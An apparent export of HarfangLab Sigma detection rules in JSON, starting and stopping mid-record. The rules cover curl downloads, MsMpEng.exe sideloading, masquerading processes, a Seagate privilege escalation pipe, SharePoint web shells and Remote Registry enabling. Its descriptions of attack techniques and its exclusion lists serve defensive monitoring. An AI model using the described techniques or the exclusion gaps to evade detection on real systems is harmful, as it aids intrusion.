https://raw.githubusercontent.com/mon5termatt/medicat_installer/'\n - 'curl.exe -s -o NUL http'\n - ' --user-agent FaceFusion/* --insecure --location --silent '\n - 'curl -e https://installer.medicatusb.com '\n - 'curl -Ls -o nul -w %{url_effective} --connect-timeout 30 --max-time 30 https://mirror.ctan.org'\n - 'curl -fsSL https://claude.ai/install.cmd -o install.cmd'\n - 'curl -fsSL https://storage.googleapis.com/claude-code-dist-'\n - ' -H Connection: close'\n - ' -w %{http_code}'\n - ' -H Authorization: Bearer * -H X-Api-Key:'\n - 'curl -k --connect-timeout 4 -u '\n - 'curl.exe --ca-native --ssl-no-revoke --url https://updaters.designexpress.eu/updaters/'\n - ' https://hydro1.gesdisc.eosdis.nasa.gov/daac-bin/OTF/HTTP_services.cgi'\n\n exclusion_image:\n - Image:\n - '*\\HashiCorp\\Vagrant\\embedded\\bin\\curl.exe'\n - '?:\\ProgramData\\HP\\HP BTO Software\\shared\\EwToolPackage\\EwToolPackageCurl\\curl\\curl.exe'\n - '?:\\soft_web\\curl\\bin\\curl.exe'\n - '?:\\tradexpress5\\bin\\curl.exe'\n - '*\\git\\mingw64\\bin\\curl.exe'\n - ParentImage: '?:\\Users\\\\*\\AppData\\Roaming\\TinyTeX\\tlpkg\\tlperl\\bin\\perl.exe'\n - GrandparentImage: '?:\\ProgramData\\3CXSBC\\3cxsbc.exe'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '\\Talend?\\'\n - '?:\\Program Files\\Zulu\\zulu-*\\bin\\java.exe'\n - '|?:\\Program Files (x86)\\BigFix Enterprise\\BES Client\\BESClient.exe'\n - '|?:\\VTOM\\ABM\\BIN\\bdaemon.exe'\n - '|?:\\Program Files (x86)\\CentraStage\\CagService.exe'\n\n exclusion_fiery:\n - Image: '?:\\Users\\\\*\\AppData\\Roaming\\Fiery Software Manager\\extract\\\\*\\FSM\\curl.exe'\n - ParentImage: '?:\\Users\\\\*\\AppData\\Local\\Temp\\RarSFX*\\FSM\\Fiery Software Manager.exe'\n\n exclusion_archicad:\n - Image|endswith: '\\GRAPHISOFT\\Archicad*\\curl.exe'\n - CommandLine|contains: '\\archicad\\curl.exe --cacert '\n ParentImage|endswith:\n - '\\Archicad.exe'\n - '\\UsageLogSender.exe'\n\n exclusion_git:\n ParentCommandLine|endswith: '\\git-update-git-for-windows --quiet --gui'\n\n exclusion_dell:\n CurrentDirectory: '?:\\Program Files\\Dell\\Dell Repository Manager\\'\n\n exclusion_fusioninventory:\n ParentCommandLine: 'start /wait cmd /c ?:\\Windows\\TEMP\\fusioninventory*.bat'\n\n exclusion_moodle:\n CommandLine|contains|all:\n - 'moodle'\n - '/admin/cron.php'\n\n exclusion_domotz:\n Image|endswith: '\\domotz_curl.exe'\n CommandLine|contains:\n - 'https://portal.domotz.com'\n - '?:\\Windows\\TEMP\\local-domotz-packages.json'\n\n exclusion_perl_install:\n ParentCommandLine|startswith: '?:\\users\\\\*\\appdata\\local\\temp\\\\*tmp\\install-tl-*\\tlpkg\\tlperl\\bin\\perl.exe'\n\n exclusion_share:\n Image|startswith: '\\\\\\\\'\n\n exclusion_llm_autokey:\n ParentImage|endswith: '\\LLM AutoHotkey Assistant.exe'\n CommandLine|contains: '-H HTTP-Referer: https://github.com/kdalanon/LLM-AutoHotkey-Assistant '\n\n exclusion_miniconda:\n GrandparentCommandLine|contains: '?:\\ProgramData\\miniconda3\\Scripts\\activate.bat ?:\\ProgramData\\miniconda3'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "65d0c693-d321-45f0-bf8b-7372027471e3",
"rule_name": "File Downloaded via cURL",
"rule_description": "Detects the usage of curl.exe to download a file.\nAttackers can use the legitimate curl.exe binary to download malicious payloads from external servers.\nIt is recommended to analyze the execution chain associated with this alert to determine its legitimacy, as well as to analyze the downloaded file.\n",
"rule_creation_date": "2023-12-19",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1048",
"attack.t1071.001",
"attack.t1105"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "65d88092-894b-431b-aa5d-70bcd00ea324",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085254Z",
"creation_date": "2026-03-23T11:45:34.085256Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085260Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/",
"https://attack.mitre.org/techniques/T1036/",
"https://attack.mitre.org/techniques/T1574/002/"
],
"name": "t1036_suspicious_msmpeng.yml",
"content": "title: Suspicious MsMpEng.exe Execution\nid: 65d88092-894b-431b-aa5d-70bcd00ea324\ndescription: |\n Detects an execution of the MsMpEng.exe binary with a wrong parent or integrity level.\n This is likely an attempt by an attacker to either make a DLL sideloading attack by putting a malicious mpsvc.dll into the same directory or to start MsMpEng.exe via process tampering to perform malicious actions under the legitimate Microsoft-signed binary.\n It is recommended to analyze the actions taken by MsMpEng after this alert and to look for any unsigned or suspicious DLLs being loaded by it via telemetry.\nreferences:\n - https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/\n - https://attack.mitre.org/techniques/T1036/\n - https://attack.mitre.org/techniques/T1574/002/\ndate: 2021/07/16\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036\n - attack.t1574.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.ProcessTampering\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n - Image|endswith: '\\MsMpEng.exe'\n - OriginalFileName: 'MsMpEng.exe'\n\n filter_legitimate_parent:\n ParentImage: '?:\\Windows\\System32\\services.exe'\n\n filter_legitimate_integrity_level:\n IntegrityLevel: 'System'\n\n exclusion_parent_unknown:\n # In case the agent doesn't know the parent of this process.\n ParentImage:\n - null\n - ''\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "65d88092-894b-431b-aa5d-70bcd00ea324",
"rule_name": "Suspicious MsMpEng.exe Execution",
"rule_description": "Detects an execution of the MsMpEng.exe binary with a wrong parent or integrity level.\nThis is likely an attempt by an attacker to either make a DLL sideloading attack by putting a malicious mpsvc.dll into the same directory or to start MsMpEng.exe via process tampering to perform malicious actions under the legitimate Microsoft-signed binary.\nIt is recommended to analyze the actions taken by MsMpEng after this alert and to look for any unsigned or suspicious DLLs being loaded by it via telemetry.\n",
"rule_creation_date": "2021-07-16",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036",
"attack.t1574.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "65f9250c-0a9d-4f2d-bfe1-cc6b130418aa",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627451Z",
"creation_date": "2026-03-23T11:45:34.627454Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627458Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1036/",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1036_suspicious_process_parent.yml",
"content": "title: Suspicious Parent Process for Windows Common Process\nid: 65f9250c-0a9d-4f2d-bfe1-cc6b130418aa\ndescription: |\n Detects the execution of a system process with an unexpected parent process.\n This is likely an attempt at masquerading as a system process and it is often the result of a process injection.\n It is recommended to investigate the child and parent processes to look for malicious content, actions, or signs of injection.\nreferences:\n - https://attack.mitre.org/techniques/T1036/\n - https://attack.mitre.org/techniques/T1055/\ndate: 2021/05/25\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.SacrificialProcess\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_svchost:\n Image|endswith: '\\svchost.exe'\n filter_parent_svchost:\n ParentImage|endswith:\n - '\\MRT.exe'\n - '\\MsMpEng.exe'\n - '\\services.exe'\n # Since Windows 10, can happen via process cloning for Werfault process dump.\n - '\\svchost.exe'\n\n selection_spoolsv:\n Image|endswith: '\\spoolsv.exe'\n filter_parent_spoolsv:\n ParentImage|endswith:\n - '\\services.exe'\n # Since Windows 10, can happen via process cloning for Werfault process dump.\n - '\\spoolsv.exe'\n\n selection_taskhost:\n Image|endswith:\n - '\\taskhost.exe'\n - '\\taskhostw.exe'\n filter_parent_taskhost:\n ParentImage|endswith:\n - '\\services.exe'\n - '\\svchost.exe'\n # Since Windows 10, can happen via process cloning for Werfault process dump.\n - '\\taskhostw.exe'\n - '\\taskhost.exe'\n\n selection_userinit:\n Image|endswith: '\\userinit.exe'\n filter_parent_userinit:\n ParentImage|endswith:\n - '\\dwm.exe'\n - '\\winlogon.exe'\n\n selection_services:\n Image|endswith: '\\services.exe'\n filter_parent_services:\n ParentImage|endswith:\n - '\\wininit.exe'\n # Can happen with a user mistake as Windows 10 search results not always returing \"services.msc\" when asking \"Services\"\n - '\\explorer.exe'\n\n selection_logonui:\n Image|endswith: '\\LogonUI.exe'\n filter_parent_logonui:\n ParentImage|endswith:\n - '\\wininit.exe'\n - '\\winlogon.exe'\n - '\\logonUI.exe'\n\n selection_lsass:\n Image|endswith: '\\lsass.exe'\n filter_parent_lsass:\n ParentImage|endswith: '\\wininit.exe'\n filter_lsass_werfault:\n #CommandLine: ''\n ParentImage|endswith: '\\lsass.exe'\n GrandparentImage|endswith: '\\wininit.exe'\n\n selection_winlogon:\n Image|endswith: '\\winlogon.exe'\n filter_parent_winlogon:\n ParentImage|endswith:\n - '\\smss.exe'\n # Since Windows 10, can happen via process cloning for Werfault process dump.\n - '\\winlogon.exe'\n\n selection_wininit:\n Image|endswith: '\\wininit.exe'\n filter_parent_wininit:\n ParentImage|endswith:\n - '\\smss.exe'\n - '\\svchost.exe'\n # Since Windows 10, can happen via process cloning for Werfault process dump.\n - '\\wininit.exe'\n\n selection_csrss:\n Image|endswith: '\\csrss.exe'\n filter_parent_csrss:\n - ParentImage|endswith:\n - '\\smss.exe'\n - '\\svchost.exe'\n # Since Windows 10, can happen via process cloning for Werfault process dump.\n - '\\csrss.exe'\n # This will happen after a System reset or reinstall\n - ParentImage: '?:\\Windows\\explorer.exe'\n Image: '?:\\$SysReset\\Scratch\\csrss.exe'\n\n selection_smss:\n Image|endswith: '\\smss.exe'\n filter_parent_smss:\n ParentImage:\n - '*\\smss.exe'\n - 'System'\n - '?:\\WINDOWS\\system32\\ntoskrnl.exe'\n - '?:\\Windows\\System32\\sihost.exe'\n\n selection_fontdrvhost:\n Image|endswith: '\\fontdrvhost.exe'\n filter_parent_fontdrvhost:\n ParentImage|endswith:\n - '\\wininit.exe'\n - '\\winlogon.exe'\n - '\\fontdrvhost.exe'\n\n selection_dwm:\n Image|endswith: '\\dwm.exe'\n filter_parent_dwm:\n ParentImage|endswith:\n - '\\winlogon.exe'\n - '\\svchost.exe'\n - '\\wininit.exe'\n - '\\dwm.exe' # in case of crash, dwm respawns itself\n\n # This is handled by the rule 2fe027bc-7a3c-412a-9493-8581215d5157\n exclusion_absolute_sofware:\n ParentImage:\n - '?:\\Windows\\SysWOW64\\rpcnet.exe'\n - '?:\\Windows\\System32\\rpcnetp.exe'\n GrandparentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_unknown_parent:\n # In case the agent doesn't know the parent of this process.\n ParentImage:\n - null\n - \"\"\n\n exclusion_ashookdevice:\n Image: '?:\\Program Files (x86)\\ASUS\\ASUS Business Manager\\DeviceLock\\svchost.exe'\n ParentImage: '?:\\Windows\\SysWOW64\\AsHookDevice.exe'\n\n # Exclusion for User Lock (https://www.isdecisions.com/products/userlock/)\n exclusion_parent_userlock:\n ParentImage: '?:\\Windows\\SysWOW64\\ULAgentExe.exe'\n\n exclusion_ksuserinit:\n # parent is ksuserinit (613ceaec88f80e7a32c3562a419eb58663ca289cfc3873f1ebe7e895fad46063)\n Image: '?:\\Windows\\System32\\userinit.exe'\n ParentImage: '?:\\Windows\\System32\\KUsrInit.exe'\n GrandparentImage:\n - '?:\\Windows\\System32\\winlogon.exe'\n - null\n - \"\"\n\n exclusion_cliaca2kp:\n Image: '?:\\Windows\\System32\\userinit.exe'\n ParentImage: '?:\\Windows\\System32\\Cliaca2kp.exe'\n GrandparentImage: '?:\\Windows\\System32\\winlogon.exe'\n\n exclusion_zonecentral:\n Image: '?:\\Windows\\System32\\userinit.exe'\n ParentCommandLine: '?:\\Program Files\\Prim?X\\ZoneCentral\\zcuserinit.exe -cryptlogon'\n GrandparentImage: '?:\\Windows\\System32\\winlogon.exe'\n\n exclusion_asus:\n Image: '?:\\Program Files (x86)\\ASUS\\ASUS Manager\\USB Lock\\svchost.exe'\n ParentImage:\n - '?:\\Windows\\SysWOW64\\AsHookDevice.exe'\n - '?:\\Windows\\System32\\taskeng.exe'\n GrandparentImage:\n - '?:\\Windows\\System32\\services.exe'\n - '?:\\Windows\\System32\\svchost.exe'\n\n exclusion_graphon:\n Image:\n - '?:\\Windows\\System32\\fontdrvhost.exe'\n - '?:\\Windows\\System32\\csrss.exe'\n ParentImage|endswith:\n - '\\Logon.exe'\n - '\\aps.aps'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'GraphOn Corporation'\n\n exclusion_services:\n Image: '?:\\Windows\\System32\\services.exe'\n ParentImage: '?:\\Windows\\System32\\cmd.exe'\n GrandparentImage: '?:\\Windows\\explorer.exe'\n\n exclusion_parentimage:\n ProcessParentImage:\n - '?:\\Program Files (x86)\\Citrix\\ICA Client\\CtxExplorerLauncher.exe'\n - '?:\\Program Files (x86)\\Citrix\\ICA Client\\Receiver\\CitrixUserInit.exe'\n - '?:\\Program Files (x86)\\LANDesk\\LDClient\\tracksvc.exe'\n - '?:\\Program Files (x86)\\Smiths Detection\\HazMatID Elite\\HazMatIDEliteTaskBar.exe'\n - '?:\\Program Files\\COMODO\\COMODO Internet Security\\cmdvirth.exe'\n - '?:\\Program Files\\Nexthink\\Collector\\BSM\\nxtbsm.exe'\n\n exclusion_lfsagent:\n Image|endswith: '\\services.exe'\n Signed: 'true'\n Signature: 'Lepide Software Private Limited'\n\n exclusion_csrss:\n ProcessCommandLine:\n - '?:\\Windows\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=* ProfileControl=Off MaxRequestThreads=16'\n - '%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=* ProfileControl=Off MaxRequestThreads=16'\n\n condition: ((selection_svchost and not filter_parent_svchost) or\n (selection_spoolsv and not filter_parent_spoolsv) or\n (selection_taskhost and not filter_parent_taskhost) or\n (selection_userinit and not filter_parent_userinit) or\n (selection_services and not filter_parent_services) or\n (selection_logonui and not filter_parent_logonui) or\n (selection_lsass and not filter_parent_lsass and not filter_lsass_werfault) or\n (selection_winlogon and not filter_parent_winlogon) or\n (selection_wininit and not filter_parent_wininit) or\n (selection_csrss and not filter_parent_csrss) or\n (selection_fontdrvhost and not filter_parent_fontdrvhost) or\n (selection_dwm and not filter_parent_dwm) or\n (selection_smss and not filter_parent_smss)) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "65f9250c-0a9d-4f2d-bfe1-cc6b130418aa",
"rule_name": "Suspicious Parent Process for Windows Common Process",
"rule_description": "Detects the execution of a system process with an unexpected parent process.\nThis is likely an attempt at masquerading as a system process and it is often the result of a process injection.\nIt is recommended to investigate the child and parent processes to look for malicious content, actions, or signs of injection.\n",
"rule_creation_date": "2021-05-25",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1036",
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "660da61b-96b8-4b11-af8c-ee0ae90ed158",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609846Z",
"creation_date": "2026-03-23T11:45:34.609849Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609857Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.x86matthew.com/view_post?id=windows_seagate_lpe",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "t1068_possible_seagate_media_sync_exploitation.yml",
"content": "title: Possible Seagate Media Sync Local Privilege Escalation Detected\nid: 660da61b-96b8-4b11-af8c-ee0ae90ed158\ndescription: |\n Detects the connection to a Seagate Media Sync Named Pipe by a suspicious process, allowing attacker to perform privilege escalation.\n This vulnerability has been assigned CVE-2022-40286 and can allow attackers to escalate as SYSTEM.\n It is recommended to investigate the machine's timeline for any other suspicious behavior.\nreferences:\n - https://www.x86matthew.com/view_post?id=windows_seagate_lpe\n - https://attack.mitre.org/techniques/T1068/\ndate: 2022/09/26\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1068\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Exploit.CVE-2022-40286\n - classification.Windows.Exploit.SeagateMediaSync\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: named_pipe_connection\ndetection:\n selection:\n PipeName: '\\MEDIA_AGGRE_PIPE.PIP'\n\n filter_seagate:\n ProcessSignature: 'Seagate Technology LLC'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "660da61b-96b8-4b11-af8c-ee0ae90ed158",
"rule_name": "Possible Seagate Media Sync Local Privilege Escalation Detected",
"rule_description": "Detects the connection to a Seagate Media Sync Named Pipe by a suspicious process, allowing attacker to perform privilege escalation.\nThis vulnerability has been assigned CVE-2022-40286 and can allow attackers to escalate as SYSTEM.\nIt is recommended to investigate the machine's timeline for any other suspicious behavior.\n",
"rule_creation_date": "2022-09-26",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1068"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "661b1467-fbc7-47f7-938e-e8e67f883109",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073432Z",
"creation_date": "2026-03-23T11:45:34.073434Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073439Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/en-us/security/blog/2025/07/22/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities/",
"https://attack.mitre.org/techniques/T1505/003/"
],
"name": "t1505_003_suspicious_aspx_creation_sharepoint.yml",
"content": "title: Suspicious File Created by Sharepoint Server\nid: 661b1467-fbc7-47f7-938e-e8e67f883109\ndescription: |\n Detects the creation of suspicious files by Sharepoint Server.\n Attackers may deploy web shells in default IIS folders to execute commands or as a persistence mechanism.\n It is recommended to investigate the content of the created file to determine its legitimacy.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2025/07/22/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities/\n - https://attack.mitre.org/techniques/T1505/003/\ndate: 2025/07/22\nmodified: 2025/10/09\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1505.003\n - attack.initial_access\n - attack.t1190\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: filesystem_event\ndetection:\n selection_file:\n Kind: 'create'\n Path|endswith:\n - '.aspx'\n - '.asp'\n - '.ashx'\n - '.asmx'\n - '.ascx'\n - '.asax'\n\n selection_app_sharepoint:\n - ProcessCommandLine|contains: 'sharepoint'\n ProcessName: 'w3wp.exe'\n - ProcessParentCommandLine|contains: 'sharepoint'\n ProcessParentName: 'w3wp.exe'\n - ProcessGrandparentCommandLine|contains: 'sharepoint'\n ProcessGrandparentName: 'w3wp.exe'\n\n exclusion_path:\n Path:\n - '?:\\inetpub\\wwwroot\\wss\\VirtualDirectories\\\\*\\global.asax'\n - '?:\\inetpub\\wwwroot\\wss\\VirtualDirectories\\\\*\\_trust\\Default.aspx'\n - '?:\\Windows\\Temp\\\\*'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "661b1467-fbc7-47f7-938e-e8e67f883109",
"rule_name": "Suspicious File Created by Sharepoint Server",
"rule_description": "Detects the creation of suspicious files by Sharepoint Server.\nAttackers may deploy web shells in default IIS folders to execute commands or as a persistence mechanism.\nIt is recommended to investigate the content of the created file to determine its legitimacy.\n",
"rule_creation_date": "2025-07-22",
"rule_modified_date": "2025-10-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1190",
"attack.t1505.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6624dc1b-2cc0-4936-b502-8f6ec161ba8e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621778Z",
"creation_date": "2026-03-23T11:45:34.621780Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621784Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.compass-security.com/2022/05/bloodhound-inner-workings-part-3/",
"https://car.mitre.org/analytics/CAR-2014-11-005/",
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1112_remote_registry_enabled_scm.yml",
"content": "title: Remote Registry Service Enabled via SCM\nid: 6624dc1b-2cc0-4936-b502-8f6ec161ba8e\ndescription: |\n Detects when the Remote Registry Service is enabled via the Service Control Manager.\n This service is disabled by default on workstations (starting with Windows 8) and enabled on servers.\n An adversary can remotely manipulate the registry of another machine if the Remote Registry service is enabled and valid credentials are obtained.\n It can be used by an attacker to prepare a Lateral Movement technique, discover the configuration of a host, achieve persistence, or anything that aids an adversary in achieving their objective.\n It is recommended to analyze the authentications and network activity around this alert to determine the user and host responsible for this action and to determine whether this action is legitimate.\nreferences:\n - https://blog.compass-security.com/2022/05/bloodhound-inner-workings-part-3/\n - https://car.mitre.org/analytics/CAR-2014-11-005/\n - https://attack.mitre.org/techniques/T1112/\ndate: 2025/08/04\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Service\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: service\ndetection:\n selection:\n AgentVersion|gte|version: 4.9.0\n ServiceName: 'RemoteRegistry'\n OperationType: 'change'\n\n filter_disabled:\n ServiceStartType: 4\n\n filter_remote:\n # Remote operations contain no information about the context thus are impossible to whitelist\n IsRemote: 'true'\n\n filter_services_local:\n ProcessImage: '?:\\Windows\\System32\\services.exe'\n IsRemote: 'false'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ccm:\n ProcessGrandparentImage:\n - '?:\\Windows\\CCM\\TSManager.exe'\n - '?:\\Windows\\CCM\\Ccm32BitLauncher.exe'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_trendmicro:\n ProcessOriginalFileName: 'housecall.ATTK.exe'\n ProcessSignature: 'Trend Micro, Inc.'\n\n exclusion_ivanti:\n ProcessAncestors|contains:\n - '?:\\Program Files\\Ivanti\\EPM Agent\\SWD\\sdistbat.exe|?:\\Program Files\\Ivanti\\EPM Agent\\SWD\\SDCLIENT.EXE'\n - '?:\\Program Files (x86)\\Ivanti\\EPM Agent\\SWD\\sdistbat.exe|?:\\Program Files (x86)\\Ivanti\\EPM Agent\\SWD\\SDCLIENT.EXE'\n\n exclusion_exchange:\n - ProcessOriginalFileName:\n - 'ExSetupUI.exe'\n - 'ExSetup.exe'\n 